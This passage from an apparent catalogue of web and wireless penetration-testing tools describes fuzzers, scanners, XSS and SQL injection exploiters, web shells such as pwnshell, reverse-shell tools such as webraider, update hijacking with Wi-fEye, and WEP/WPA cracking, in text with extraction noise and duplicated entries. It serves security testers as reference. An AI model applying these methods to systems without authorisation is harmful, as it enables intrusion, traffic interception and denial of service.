payloads by placing a file called fuzzers.jbrf within your working directory. - Added 3 new file extension fuzzers (thnx Adam) The components of JBroFuzz are all integrated into a single window and can be ac cessed through individual tabs. These tabs are:

Fuzzing * The fuzzing tab is the main tab of JBroFuzz, responsible for all fuzzing opera tions performed over the network. Depending on the fuzzer payloads selected, it creates the malformed data for each request, puts it on the wire and writes the response to a file. Graphing * The graphing tab is responsible for graphing (in a variety of forms) the respo nses received while fuzzing. This tab can offer a clear indication of a response that is different then the rest received, an indication of further examination being required. Payloads * The payloads tab is a collection of fuzzers with their corresponding payloads that can be used while fuzzing. Payloads are added to the request in the fuzzing tab; a more clear view of what payloads are available, how they are grouped and what properties each fuzzer has can be seen in this tab. Headers * The headers tab is a collection of browser headers that can be used while fuzz ing. Headers are obtained from different browsers on different platforms and ope rating systems. This tab is provided, as many web applications respond different ly to different browser impersonation attacks. System * The system tab represents the logging console of JBroFuzz at runtime. Here you can access java runtime information, see any errors that might occur and also t rack operation in terms of events being logged. LFImap http://code.google.com/p/lfimap/ This script is used to take the highest beneficts of the local file include vuln erability in a webserver A new simple tool was released recently which focuses purely on LFI attacks. Functions * * * * * * Automatically find the root of the file system Detect default files outside of the web folder Attempts to detect passwords inside the files Supports basic authentication Can use null byte to bypass some controls Writes a report of the scan to a file

Mantra http://www.getmantra.com/index.html Mantra is a dream that came true. It is a collection of free and open source too ls integrated into a web browser, which can become handy for students, penetrati on testers, web application developers, security professionals etc. It is portab le, ready-to-run, compact and follows the true spirit of free and open source so ftware. Mantra is a security framework which can be very helpful in performing a

ll the five phases of attacks including reconnaissance, scanning and enumeration , gaining access, escalation of privileges, maintaining access, and covering tra cks. Apart from that it also contains a set of tools targeted for web developers and code debuggers which makes it handy for both offensive security and defensi ve security related tasks. Mantra is lite, flexible, portable and user friendly with a nice graphical user interface. You can carry it in memory cards, flash drives, CD/DVDs, etc. It can be run natively on Linux, Windows and Mac platforms. It can also be installed on to your system within minutes. Mantra is absolutely free of cost and takes no t ime for you to set up. Netsparker http://www.mavitunasecurity.com/ Netsparker can find and report security issues such as SQL Injection and Cross-si te Scripting (XSS) in all web applications regardless of the platform and the te chnology they are built on. Netsparker's unique detection and exploitation techniques allows it to be dead a ccurate in reporting hence it's the first and the only False Positive Free web a pplication security scanner R U Dead Yet http://code.google.com/p/r-u-dead-yet/ R-U-Dead-Yet, or R.U.D.Y for short, implements the generic HTTP DoS attack via l ong form field submissions. The attack's theory is described in the following pa per: http://www.owasp.org/images/4/43/Layer_7_DDOS.pdf This tool runs with an interactive console menu, automatically detecting forms w ithin given URL, and allowing the user to choose which forms and form fields are desirable to use for the POST attack. In addition, the tool offers unattended e xecution by providing the necessary parameters within a configuration file. SAHI http://sahi.co.in/w/ Sahi is an automation tool to test web applications. Sahi injects javascript int o web pages using a proxy and the javascript helps automate web applications. Sahi is a tester friendly tool. It abstracts out most difficulties that testers face while automating web applications. Some salient features include excellent recorder, platform and browser independence, no XPaths, no waits, multi-threaded playback, excellent Java interaction and inbuilt reporting. Features * * * * * * * * * * Browser and Operating System independent Powerful recorder which works across browsers Powerful Object Spy Intuitive and simple APIs Javascript based scripts for good programming control Version Controllable text-based scripts In-built reports In-built multi-threaded or parallel playback of tests Tests do not need the browser window to be in focus Command line and ant support for integration into build processes

* * * * * * * *

Supports external proxy, HTTPS, 401 & NTLM authentications Supports browser popups and modal dialogs Supports AJAX and highly dynamic web applications Scripts very robust Works on applications with random auto-generated ids Very lightweight and scalable Supports data-driven testing. Can connect to database, Excel or CSV file. Ability to invoke any Java library from scripts

Limitations * Framesets/pages with frames/iframes loading pages from multiple domains is not supported. Sahi cannot handle pages which have other pages from different domai ns embedded in them using iframes or frames. So you cannot have a page from goog le.com having an iframe with a page from yahoo.com. Note that this is not the sa me as switching between domains, where you navigate from a google.com page to a yahoo.com page, which will work in Sahi. * File upload field will not be populated on browsers for javascript verificatio n. File upload itself works fine Sandcat http://www.syhunt.com/?n=Sandcat.Sandcat Our in-depth understanding of security issues, emerging Web 2.0 technologies suc h as AJAX, traditional Web technologies, and Web programming languages such as P HP, enabled us to deliver exactly what we set out to provide - the most featurerich and advanced web application security scanner available to date. Sandcat combines Syhunt's state-of-the-art, multi-process scanning technologies with the incredibly fast LUA language to perform remote web application security scans. While spidering a web site and hunting vulnerabilities, Sandcat emulates a modern, HTML 5-aware web browser. Download it and have a look for yourself! WSFuzzer http://www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project WSFuzzer is a LGPL'd program, written in Python, that currently targets Web Serv ices. In the current version HTTP based SOAP services are the main target. This tool was created based on, and to automate, some real-world manual SOAP pen test ing work. This tool is NOT meant to be a replacement for solid manual human anal ysis. Please view WSFuzzer as a tool to augment analysis performed by competent and knowledgable professionals. Web Services are not trivial in nature so expert ise in this area is a must for proper pen testing. WackoPicko https://github.com/adamdoupe/WackoPicko WackoPicko is a vulnerable web application used to test web application vulnerab ility scanners. Read more Watcher http://websecuritytool.codeplex.com/ Watcher is a runtime passive-analysis tool for HTTP-based Web applications. Bein g passive means it wont damage production systems, its completely safe to use in C loud computing, shared hosting, and dedicated hosting environments. Watcher dete cts Web-application security issues as well as operational configuration issues. Watcher provides pen-testers hot-spot detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads (potential XSS), cookies, comments,

HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more WebCruiser http://sec4app.com/ WebCruiser - Web Vulnerability Scanner, a compact but powerful web security scan ning tool that will aid you in auditing your site! It has a Vulnerability Scanne r and a series of security tools. It can support scanning website as well as POC( Prooving of concept) for web vul nerabilities: SQL Injection, Cross Site Scripting, XPath Injection etc. So, WebC ruiser is also an automatic SQL injection tool, a XPath injection tool, and a Cr oss Site Scripting tool! Function: * Crawler(Site Directories And Files); * Vulnerability Scanner(SQL Injection, Cross Site Scripting, XPath Injection etc .); * POC(Proof of Concept): SQL Injection, Cross Site Scripting, XPath Injection et c.; * GET/Post/Cookie Injection; * SQL Server: PlainText/Union/Blind Injection; * MySQL/DB2/Access: Union/Blind Injection; * Oracle: Union/Blind/CrossSite Injection; * Post Data Resend; * Administration Entrance Search; * Time Delay For Search Injection; * Auto Get Cookie From Web Browser For Authentication; * Report Output. WebScarab NG https://code.google.com/p/webscarab-ng/ http://www.owasp.org/index.php/OWASP_WebScarab_NG_Project WebScarab-NG is a complete rewrite of the old WebScarab application, with a spec ial focus on making the application more user-friendly. WebScarab is a framework for analysing applications that communicate using the H TTP and HTTPS protocols. It is written in Java, and is thus portable to many pla tforms. WebScarab has several modes of operation, implemented by a number of plu gins. In its most common usage, WebScarab operates as an intercepting proxy, all owing the operator to review and modify requests created by the browser before t hey are sent to the server, and to review and modify responses returned from the server before they are received by the browser. WebScarab is able to intercept both HTTP and HTTPS communication. The operator can also review the conversation s (requests and responses) that have passed through WebScarab. Websecurity http://code.google.com/p/websecurify/ Websecurify Security Testing Framework identifies web security vulnerabilities b y using advanced browser automation, discovery and fuzzing technologies. The fra mework is written in JavaScript and successfully executes in numerous platforms including modern browsers with support for HTML5, xulrunner, xpcshell, Java, V8 and others. Websecurify is a web and web2.0 security initiative specializing in researching s ecurity issues and building the next generation of tools to defeat and protect w eb technologies.

This version contains the following improvements: * * * * * * * * * * Users interface improvements Faster, more stable testing platform Improved extension development API Less false-positives Significant testing performance gains Automatic taking of vulnerability screenshots Integration with the Websecurify Network Improved fuzzing strategies Workspace perspectives Integrated application and extension automatic updates

XSSer http://xsser.sourceforge.net/ XSSer is an open source penetration testing tool that automates the process of d etecting and exploiting XSS injections against different applications. It contains several options to try to bypass certain filters, and various specia l techniques of code injection. XSSploit http://www.scrt.ch/pages_en/xssploit.html XSSploit is a multi-platform Cross-Site Scripting scanner and exploiter written in Python. It has been developed to help discovery and exploitation of XSS vulne rabilities in penetration testing missions. When used against a website, XSSploit first crawls the whole website and identif ies encountered forms. It then analyses these forms to automatically detect exis ting XSS vulnerabilities as well as their main characteristics. The vulnerabilities that have been discovered can then be exploited using the ex ploit generation engine of XSSploit. This extensible functionality allows choosi ng the desired exploit behaviour and automatically generates the corresponding H TML link embedding the exploit payload. XSSploit comes with several files : - xssploit.py: The main file. Contains the XSSploit core and the command line in terface. - gui.py: The GUI interface. - extensions.txt: XSSploits spider crawls web pages using REGEXPs. This file cont ains the file extensions on the server that should be spidered. To add a new ext ension, simply add a new line in this file and write your extension. Dont forget the dot. - exploits.xml: The exploits database. Please refer to this file to create new e xploits. - report.xsl: This stylesheet is a very basic example on how to display the repo rt generated by XSSploit. Put this file in the same folder as the XML report and point your browser to the report file to see the report. acunetix http://www.acunetix.com/cross-site-scripting/scanner.htm Acunetix Web Vulnerability Scanner (WVS) is an automated web application securit y testing tool that audits your web applications by checking for exploitable hac king vulnerabilities. Automated scans may be supplemented and cross-checked with

the variety of manual tools to allow for comprehensive web site and web applica tion penetration testing. davtest http://code.google.com/p/davtest/ DAVTest tests WebDAV enabled servers by uploading test executable files, and the n (optionally) uploading files which allow for command execution or other action s directly on the target. It is meant for penetration testers to quickly and eas ily determine if enabled DAV services are exploitable. DAVTest supports: * * * * * * Automatically send exploit files Automatic randomization of directory to help hide files Send text files and try MOVE to executable name Basic and Digest authorization Automatic clean-up of uploaded files Send an arbitrary file

fiddler http://www.fiddler2.com/fiddler2/ Fiddler is a Web Debugging Proxy which logs all HTTP(S) traffic between your com puter and the Internet. Fiddler allows you to inspect all HTTP(S) traffic, set b reakpoints, and "fiddle" with incoming or outgoing data. Fiddler includes a powe rful event-based scripting subsystem, and can be extended using any .NET languag e. Fiddler is freeware and can debug traffic from virtually any application, includ ing Internet Explorer, Mozilla Firefox, Opera, and thousands more. fimap http://http://code.google.com/p/fimap/ fimap is a little python tool which can find, prepare, audit, exploit and even g oogle automaticly for local and remote file inclusion bugs in webapps. fimap sho uld be something like sqlmap just for LFI/RFI bugs instead of sql injection. It' s currently under heavy development but it's usable. The goal of fimap is to improve the quality and security of your website. fuzzdb http://code.google.com/p/fuzzdb/ fuzzdb is a comprehensive set of known attack pattern sequences, predictable loc ations, and error messages for intelligent brute force testing and exploit condi tion identification of web applications. Many mechanisms of attack used to exploit different web server platforms and app lications are triggered by particular meta-characters that are observed in more than one product security advisory. fuzzdb is a database attack patterns known t o have caused exploit conditions in the past, categorized by attack type, platfo rm, and application. Because of the popularity of a age formats, resources such as ally located in a small number e of these, sorted by platform ke approach. small number of server types, platforms, and pack logfiles and administrative directories are typic of predictable locations. A comprehensive databas type, makes brute force fuzz testing a scalpel-li

Since system errors contain predictable strings, fuzzdb contains lists of error messages to be pattern matched against server output in order to aid detection s oftware security defects. Primary sources used for attack pattern research: * * * * * * * researching old web exploits for repeatable attack strings scraping scanner patterns from http logs various books, articles, blog posts, mailing list threads patterns gleaned from other open source fuzzers and pentest tools analysis of default app installs system and application documentation error messages

It's like a non-automated scanner without the scanner. iExploder http://code.google.com/p/iexploder/ If you like to fuzz-force your way into finding vulnerabilities, chances are tha t you will like iExploder. It is inspired from mangleme another similar tool to find security and reliability problems in web browsers. It feeds the browser under consideration with bad HTML and CSS code, so as to te st its stability and security. It continuously feeds browsers bad data in the ho pe that they will eventually crash. It has been designed to run for hours, or ev en days until the browser crashes. iExploder is available as a full-featured bro wser harness, standalone webserver or CGI script. A few of its features are: * Tests all HTML and CSS attributes that Mozilla, Webkit and other browsers supp ort * Basic fuzzing for media formats (bmp, gif, ico, jng, jpg, ogg, png, snd, svg, tiff, wav, xbm, xpm) * Very basic DOM manipulation fuzzing via JS * HTTP header fuzzing * CSS Selector fuzzing * Logic, buffer overflow, and format string testing * An unlimited amount of repeatable tests * Sequential and random testcase testing, with the ability to resume (sequential only) * Tools to help isolate which test crashed the browser, as well as locate backtr ace information mitmproxy http://mitmproxy.org/ mitmproxy is an SSL-capable, intercepting HTTP proxy. It provides a console inte rface that allows traffic flows to be inspected and edited on the fly. mitmdump is the command-line version of mitmproxy, with the same functionality b ut without the frills. Think tcpdump for HTTP. Features * * * * Intercept and modify HTTP traffic on the fly Save HTTP conversations for later replay and analysis Replay both HTTP clients and servers Make scripted changes to HTTP traffic using Python

* SSL interception certs generated on the fly monkeyfist http://hexsec.com/misc/monkeyfist/ MonkeyFist is a tool that creates dynamic request forgeries based on cross-domai n data leakage. The tool then constructs a payload based on data in the payloads .xml file and sends it to the user's browser. This may include session data bypa ssing protection mechanisms for Cross-Site Request Forgery. pinata http://code.google.com/p/pinata-csrf-tool/ Pinata is a Python Script that will generate Proof of Concept CSRF HTML from HTT P request. Cross-site request forgery, also known as a one-click attack or session riding a nd abbreviated as CSRF (sea-surf) or XSRF, is a type of malicious exploit of a w ebsite whereby unauthorized commands are transmitted from a user that the websit e trusts. Pinata is a Python Script that will generate Proof of Concept CSRF HTM L from HTTP request. Overview: - The tool will generate proof of concept CSRF HTML given an HTTP request. It wi ll automatically check whether it is a GET or a POST request and with further va lidation for standard POST and Multipart/form POST. - The tool will then create an HTML corresponding to the type of the request. - The GET CSRF HTML includes IMG tag with SRC set to the URL being tested. - The POST CSRF HTML is created with auto submit java script form with names and values from the HTTP request. w3af http://w3af.sourceforge.net/ w3af is a Web Application Attack and Audit Framework. The project's goal is to c reate a framework to find and exploit web application vulnerabilities that is ea sy to use and extend. watobo http://sourceforge.net/apps/mediawiki/watobo/index.php?title=Main_Page WATOBO is intended to enable security professionals to perform highly efficient (semi-automated ) web application security audits. We are convinced that the sem i-automated approach is the best way to perform an accurate audit and to identif y most of the vulnerabilities. WATOBO has no attack capabilities and is provided for legal vulnerability audit purposes only WATOBO works like a local proxy, similar to Webscarab, Paros or BurpSuite. Additionally, WATOBO supports passive and active checks. Passive checks are more like filter functions. They are used to collect useful information, e.g. email or IP addresses. Passive checks will be performed during normal browsing activit ies. No additional requests are sent to the (web) application. Active checks instead will produce a high number of requests (depending on the c heck module) because they do the automatic part of vulnerability identification, e.g. during a scan.

watobo http://watobo.sourceforge.net/ WATOBO is intended to enable security professionals to perform highly efficient (semi-automated ) web application security audits. We are convinced that the sem i-automated approach is the best way to perform an accurate audit and to identif y most of the vulnerabilities. WATOBO has no attack capabilities and is provided for legal vulnerability audit purposes only. WATOBO works like a local proxy, similar to Webscarab, Paros or BurpSuite. Additionally, WATOBO supports passive and active checks. Passive checks are more like filter functions. They are used to collect useful information, e.g. email or IP addresses. Passive checks will be performed during normal browsing activit ies. No additional requests are sent to the (web) application. Active checks instead will produce a high number of requests (depending on the c heck module) because they do the automatic part of vulnerability identification, e.g. during a scan. webinject http://www.webinject.org/ WebInject is a free tool for automated testing of web applications and web servi ces. It can be used to test individual system components that have HTTP interfac es (JSP, ASP, CGI, PHP, AJAX, Servlets, HTML Forms, XML/SOAP Web Services, REST, etc), and can be used as a test harness to create a suite of [HTTP level] autom ated functional, acceptance, and regression tests. A test harness allows you to run many test cases and collect/report your results. WebInject offers real-time results display and may also be used for monitoring system response times. WebInject can be used as a complete test framework that is controlled by the Web Inject User Interface (GUI). Optionally, it can be used as a standalone test run ner (text/console application) which can be integrated and called from other tes t frameworks or applications. webraider http://code.google.com/p/webraider/ WebRaider is a plugin based automated web application exploitation tool which fo cuses to get a shell from multiple targets or injection point. Idea of this attack is very simple. Getting a reverse shell from an SQL Injectio n with one request without using an extra channel such as TFTP, FTP to upload th e initial payload. * Its only one request therefore faster, * Simple, you dont need a tool you can do it manually by using your browser or a simple MITM proxy, * Just copy paste the payload, * CSRF(able), Its possible to craft a link and carry out a CSRF attack that will give you a reverse shell, * Its not fixed, you can change the payload, * Its short, Generally not more than 3.500 characters, * Doesnt require any application on the target system like FTP, TFTP or debug.exe , * Easy to automate.

Dependencies Internally WebRaider uses Metasploit. The authors use a specific version of Meta sploit, they trimmed the fat from Metasploit to launch it faster and make it sma ller. You can change the paths and make it work with the latest Metasploit of yo ur own setup. Also note due to the reverse shells and Metasploit components this software will be detected a virus by AV software x5s http://xss.codeplex.com/ x5s is a Fiddler addon which aims to assist penetration testers in finding cross -site scripting vulnerabilities. It injects ASCII to find traditional encoding i ssues, and it injects special Unicode characters and encodings to identify where XSS filters might be bypassed. By auto-injecting special character-probes into all inputs x5s can detect where the emitted character may be ill-encoded or tran sformed in a vulnerable way. The methodology used by x5s is to inject small prob es which do not constitute a working XSS payload. In other words, x5s will not i nject XSS payloads anywhere, it merely aims to identify character encoding and t ransformation issues that lead to XSS. x5s acts as an assistant to the security tester by speeding up the process of pa rameter manipulation and aggregating the results for quick viewing. It automates some of the preliminary XSS testing work by enumerating and injecting canaries into all input fields/parameters sent to an application and analyzing how those canaries were later emitted. E.g. Was the emitted output encoded safely or not? Did an injected character transform to something else? x5s does not inject XSS payloads - it does not attempt to exploit or confirm an XSS vulnerability. It's designed to draw your attention to the fields and parame ters which seem likely candidates for vulnerability. A security-tester would rev iew the results to find issues where special characters were dangerously transfo rmed or emitted without a safe encoding. This can be done by quickly scanning th e results, which have been designed with the intention of providing quick visual inspection. Results filters are also included so the tester could simply click show hotspots to see only the potential problem areas. After identifying a hotsp ot it's the tester's job to perform further validation and XSS testing. The types of test cases that x5s includes: 1. Traditional test cases - characters typically used to test for XSS injection such as <, >, ",and ' which are used to control HTML, CSS, or javascript; 2. Transformable test cases - characters that might uppercase, lowercase, Normal ize, best-fit map, or other wise transform to completely different characters, E .g. the Turkish '' which will lower-case to 'i' in culture-aware software. 3. Overlong UTF-8 test cases - non-shortest UTF-8 encodings of the 'traditional' test cases noted above. E.g. the ASCII < is 0x3C normally and 0xC0 0xBC in nonshortest form UTF-8. Wireless Airtun-ng http://www.aircrack-ng.org/doku.php?id=main Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking t

ools. In fact, Aircrack-ng is a set of tools for auditing wireless networks. FireShepherd http://notendur.hi.is/~gas15/FireShepherd/ FireShepherd, a small console program that floods the nearby wireless network wi th packets designed to turn off FireSheep, effectively shutting down nearby Fire Sheep programs every 0.5 sec or so, making you and the people around you secure from most people using FireSheep. The program kills the current version of FireSheep running nearby, but the user is still in danger of all other session hijacking mechanisms. Do not do anything over a untrusted network that you cannot share with everyone. -Know that this is only a temporary solution to the FireSheep problem, created t o give people the chance to secure themselves and the others around them from th e current threat, while the security vulnerabilities revealed by FireSheep are b eing fixed. Optional command line switches: -i *IP* Ip Destination for packets, local router is recommended. (A trivial face book server is default) The local router can be found with the tracert command. (For example the first h it from "tracert www.google.com") -t *timeout* Timeout in ms for packet sending. About 200 is ok for a local route r. (400 is default) -h Shows this message Keykeriki http://www.remote-exploit.org/?page_id=187 universal wireless keyboard sniffer: Keykeriki. This opensource hardware and sof tware project enables every person to verify the security level of their own key board transmissions, and/or demonstrate the sniffing attacks (for educational pu rpose only). The hardware itself is designed to be small and versatile, it can b e extended to currently undetected/unknown keyboard traffic, and/or hardware ext ensions, for example, a repeating module or amplifier Kismac http://trac.kismac-ng.org/ KisMAC wiki! KisMAC is an open-source and free sniffer/scanner application for M ac OS X. It has an advantage over MacStumbler / iStumbler / NetStumbler in that it uses monitor mode and passive scanning. KisMAC supports several third party PCMCIA cards: Orinoco, PrismII, Cisco Airone t, Atheros and PrismGT. USB devices with Intersil Prism2, Ralink rt2570 and rt73 , and Realtek rtl8187 chipsets are in progress towards full support as well. All of the internal AirPort hardware is supported for scanning. Wi-fEye http://wi-feye.za1d.com/index.html Wi-fEye can be considered as a GUI to almost all tools that we use daily. It is designed to be the ultimate point-and-shoot tool. Wi-fEye will allow you to perf orm a number of powerful attacks automatically. All you have to do is to launch Wi-fEye, choose which attack to perform, select your target and let Wi-fEye do t he magic! So, you see it is designed to help with network penetration testing, r econnaissance, etc. Wi-fEye is divided to four main menus:

1. Cracking menu: This menu will allow you to: Enable monitor mode View available Wireless Networks. Launch Airodump-ng on a specific AP WEP cracking: This will allow you to perform the following attacks automatically : * Interactive packet replay. * Fake Authentication Attack. * Korek Chopchop Attack. * Fragmentation Attack. * Hirte Attack (cfrag attack). * Wesside-ng. WPA Cracking: This contains the following attacks: * Wordlist Attack * Rouge AP Attack 2. Mapping: This menu will allow you to do the following: Scan the network and view the connected hosts Use Nmap automatically 3. MITM: This menu will allow you to do the following Automatically: Enable IP forwarding ARP Spoof Launch ettercap (Text mode). Sniff SSL/HTTPS traffic. Sniff URLs and send them to browser. Sniff messengers from instant messengers. Sniff images. DNS Spoof. HTTP Session Hijacking (using Hamster). 4. Others: This menu will allow you to do the following automatically: Change MAC Address. Hijack software updates (using Evilgrade). By now, you must have already seen why we said that it is a GUI for different to ols. It can be considered as a simple Python wrapper for different tools. The Wi -fEye.py file will help you to integrate the following list of the tools needed for each module: * Aircrack-ng is needed for all the attacks in the cracking menu * Nmap is used in Nmap menu. * Ettercap is very important as it is used in the following attacks: 1. 2. 3. 4. 5. ARP Spoofing. SSL/HTTPS sniffing. URL sniffing. Dns Spoofing. Image sniffing.

* Msgsnarf to sniff instant messengers messages. * Hamster for HTTP session Hijacking * Expect and Evilgrade for software hijacking. For example, if you want to hijack software updates in the network, all you have to do is select the software you want to hijack its update, select a payload, s elect the target and thats it! Wif-Eye will use Metasploit to create and encrypt the agent, start multi/handler, stop the Apache if it is already running, start the evilgrade webserver and DNS spoof the updates to evilgrade! Its that simple! WiPhire

http://sourceforge.net/projects/wiphire/ WiPhire is a Bash script aimed at making the Wireless Hacking process a lot easi er. This script was written on Backtrack 4 and designed to be used with Backtrac k 4. This script was also designed to be used with the Alfa AWUS036H Wireless ad apter with the RTL8187 chipset. If you do not have this chipset but another adap ter that is compatible with the aircrack-ng suite you will need to put it into m onitor mode prior to running the script if you wish to use an option that needs monitor mode enabled. This script needs to be ran as root. These are the functions of the script: * * * * * * autoMACtic MAC spoofer Ability to crack WEP networks Ability to crack WPA networks Perform simple MITM attacks DNSspoof a network Use airdrop-ng to create a jammer

Programs that WiPhire Uses: * * * * * * * * * * * * * * * airmon-ng airodump-ng aireplay-ng aircrack-ng airdrop-ng xterm crunch pyrit sslstrip arpspoof macchanger kate apache2 ettercap Firefox

grimwepa http://code.google.com/p/grimwepa/ Consider Grimwepa a front-end to many famous Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA) password auditors. We havent been able to use this o ne as we have been very busy with various assignments. But, still this is worth a mention. Grimwepa is a password cracker for both WEP and WPA-encrypted access points (rou ters). It is written in Java and is intended for use with the Linux Operating Sy stem, more specifically for the BackTrack distros. It has only two modes: Crack W EP-encrypted access points (routers) and crack WPA-encrypted access points. It c an search for new targets, and auto-selects your cracking method! Pretty much ev erything is done for you. inSSIDer http://www.metageek.net/products/inssider Genuine geeks, whether professional or casual, need Wi-Fi tools that help troubl eshoot WLAN networks. With inSSIDer, MetaGeek has created a gift that keeps on g iving. Our award-winning, open-source Wi-Fi scanner software, inSSIDer, is an al ternative to network scanners like NetStumbler. One big difference: inSSIDer act ually works with Windows Vista, Windows 7, and 64-bit PCs.

inSSIDer is FREE, open-source Wi-Fi scanning software. And yet you want to know more. Wow. you truly are our type of geek. Take a look at the features below to see what makes inSSIDer special. What's Unique about inSSIDer? * * * * Compatible with Uses the Native Sort results by Compatible with Windows XP, Vista and 7 (32 and 64-bit) Wi-Fi API and your current Wireless network card Mac Address, SSID, Channel, RSSI and "Time Last Seen" most GPS devices (NMEA v2.3 and higher)

How can inSSIDer help me? * Inspect your WLAN and surrounding networks to troubleshoot competing access po ints * Track the strength of received signal in dBm over time * Filter access points in an easy-to-use format * Highlight access points for areas with high Wi-Fi concentration * Export Wi-Fi and GPS data to a KML file to view in Google Earth. * Filter through hundreds of scanned access points ubitack http://code.google.com/p/ubitack/ This tool automates some of the tasks you might need on a (wireless) penetration test or while you are on the go. It aims to be a multi purpose tool for: * Connect to different access points with different credentials with easy to use config files * Run a evil / rogue access point (Karma, Karmetasploit) * Sniff credentials (dsniff suite, sslstrip) * Hamster credentials (Wifizoo, Ferret, Hamster) * Test WEP encryption (Wepbuster) * Set up secure connections in hostile environments (SSH tunnel, OpenVPN, DNS Tu nnel) * Install and Update required software Written for the security disto Backtrack, heavily tested on BT4 Final in particu lar, also running on Ubuntu 9.10, but might work on others systems, too. binpack http://westcoasthackers.net/projects/binpack/ BinPack is a portable security environment for Windows. With 100+ security tools in the repository, you can easily convert any system into a hacking platform in minutes. honggfuzz http://code.google.com/p/honggfuzz/ Honggfuzz is a general-purpose fuzzing tool. Given a starting corpus of test fil es, Hongfuzz supplies and modifies input to a test program and utilize the ptrac e() API/POSIX signal interface to detect and log crashes. Basically its a simple, easy to use via command-line interface, providing nice an alysis of software crashes in a simple form of file names. It has been used to find a few (possibly exploitable) bugs in some major softwar e packages including freetype2, librsvg and libtiff. Features

* Easy setup: No complicated configuration be run directly from the command line. * Fast: Multiple Hongfuzz instances can be fuzzing. * Powerful analysis capabilities: Hongfuzz ate analysis (e.g. ptrace) interface under iKAT

files or setup necessary Hongfuzz can run simultaneously for more efficient will use the most powerful process st a given OS.

http://ikat.ha.cked.net/Windows/index.html iKAT was designed to aid security consultants with the task of auditing the secu rity of a Windows based internet Kiosk terminal. iKAT is designed to provide acc ess to the underlying operating system of a Kiosk terminal by invoking native OS functionality. This tool should be (and is) used by Kiosk vendors/developers/su ppliers to test the security of their own Kiosk products. Designed as a SaaS, iKAT features many methods of escaping out of a browser jail ed environment and gaining command execution. iKAT is a website you visit from a Kiosk, its quick, free, and aims to please. iKAT is solely developed by myself (Paul Craig) a Kiosk hacking enthusiast from New Zealand. Whats New in iKAT v3 Signed Code All iKAT tools, VBScripts, ActiveXs, ClickOnce, SilverLight apps are now signed by a trusted CA! Four months ago i placed a Donate Now button on the front page of iKAT, hoping to raise money for a code signing certificate Sadly only two peopl e donated cash (Enrique Exposito Martinez and Gerald Fehringer, you guys rock) L uckily a Kiosk vendor was willing to come to the party and donate the remaining cash. Big thanks to Kioware Kiosks, who kindly donated the remaining money. All iKAT tools are now signed by a trusted CA. More Tools iKAT now contains more tools packaged in different containers, file formats, PDF s, and even silent installers. More Java Applets, More VBScript, More WMI! iKAT ActiveX A newly developed ActiveX which focuses on Windows Shell hacking and process spa wning. The ActiveX is signed and provides a mad amount of functionality. iKAT OfficeKAT Thanks to Didier Stevens who donated his Excel Spawn CMD in Memory trick to the iK AT project OfficeKAT allows you to pop shell in environments where you can run E xcel, whats more you dont need to write to the file system. iKAT SilverLight SilverLight (and mono) are now supported by iKAT, and provide yet another attack vector for your pleasure Improved URI + File Handler Enumeration Vastly improved enumeration code, more URIs, more instant One click magic. I also a dded support some of the more interesting Microsoft based URI handler vulnerabil ities released this year. Emo Kiosking Crashing the Kiosk The fastest way to get out of a browser jail environment is to simply CRASH IT. Oddly enough this is also the easiest thing to do to a browser, and Emo-Kiosking has become a personal favourite trick of mine. iKAT now supports over 60 differ ent methods of crashing a browser, or a browser add-on This allows you to quickl

y drop back to the desktop, often with only one click required. To use iKat just visit the following URL in a kiosk system browser: http://ikat.ha.cked.net prn-2-me http://blog.c22.cc/2010/11/23/printer-mitm-revisited-prn-2-me/ PRN-2-me is a simple listener that can be configured to run on any port (default is 9100 for jetdirect style connections). The tool will then save all incoming PCL and PostScript print jobs to file and forward them on to the real printer. pwnshell http://i8jesus.com/?p=191 What do you do when you have an arbitrary file upload to a web-accessible direct ory in J2EE? Obviously, you need a JSP shell! But theres one problem: the availab le ones are kind of terrible. The Metasploit reverse shell is only intended to s erve as placeholder for an already-owned box. The world needs a JSP shell that r eally helps a blackbox attacker pivot to important assets, so I took a stab at i t. Its called quite lamely called pwnshell. What is it? A single JSP file, embedded with jQuery and everything else you need to make an awesome web shell. How do you use it? 1. Upload it to the victim server (try it on a local Tomcat server!) 2. Browse to it 3. Pretend youre on looking at xterm Where does it work? - Works across platform - Works on Java 1.5+ (probably 1.4 too, but I havent tested) Why would you use it? - Browse around the system (as the web application system user) - Execute arbitrary system commands (its a shell, after all) - Show and alter session variables - Dump JNDI entries winautopwn http://winautopwn.co.nr/ Autohack your targets with least possible interaction. Features : - Contains already custom-compiled executables of famous and effective exploits alongwith a few original exploits. - No need to debug, script or compile the source codes. - Scans all ports 1 - 65535 after taking the IP address and tries all possible e xploits according to the list of discovered open ports (OpenPorts.TXT) - PortScan is multi-threaded. - Doesn't require any Database at the back-end like others - Can be also be used to test effectiveness of IDS/IPS - Launched exploits are independent and don't rely on service fingerprinting (to avoid evasion, if any)

The aim of creating winAUTOPWN is not to compete with already existing commercia l frameworks like Core Impact (Pro), Immunity Canvas, Metasploit Framework (free ware), etc. which offer autohacks, but to create a free, quick, standalone appli cation which is easy to use and doesn't require a lot of support of other depend encies. Also not forgetting that winAUTOPWN unlike other frameworks maintains the origin al exploit writer's source code intact just as it was and uses it. This way the exploit writer's credit and originality is maintained. The source is modified on ly when required to enable a missing feature or to remove hard-coded limitations . Under these circumstances also, the exploit writer's credits remain intact. Newer exploit modules are added as and when they release and older ones are also being daily added. Binaries of perl, php, python and cygwin DLLs (included) are required to exist e ither in a common folder or should be properly installed with their paths regist ered for those exploits which are cannot be compiled into a PE-exe. Some anti-viruses might falsely detect the exploits as malicious. winautopwn http://winautopwn.co.nr/ Autohack your targets with least possible interaction. Features : - Contains already custom-compiled executables of famous and effective exploits alongwith a few original exploits. - No need to debug, script or compile the source codes. - Scans all ports 1 - 65535 after taking the IP address and tries all possible e xploits according to the list of discovered open ports (OpenPorts.TXT) - PortScan is multi-threaded. - Doesn't require any Database at the back-end like others - Can be also be used to test effectiveness of IDS/IPS - Launched exploits are independent and don't rely on service fingerprinting (to avoid evasion, if any) The aim of creating winAUTOPWN is not to compete with already existing commercia l frameworks like Core Impact (Pro), Immunity Canvas, Metasploit Framework (free ware), etc. which offer autohacks, but to create a free, quick, standalone appli cation 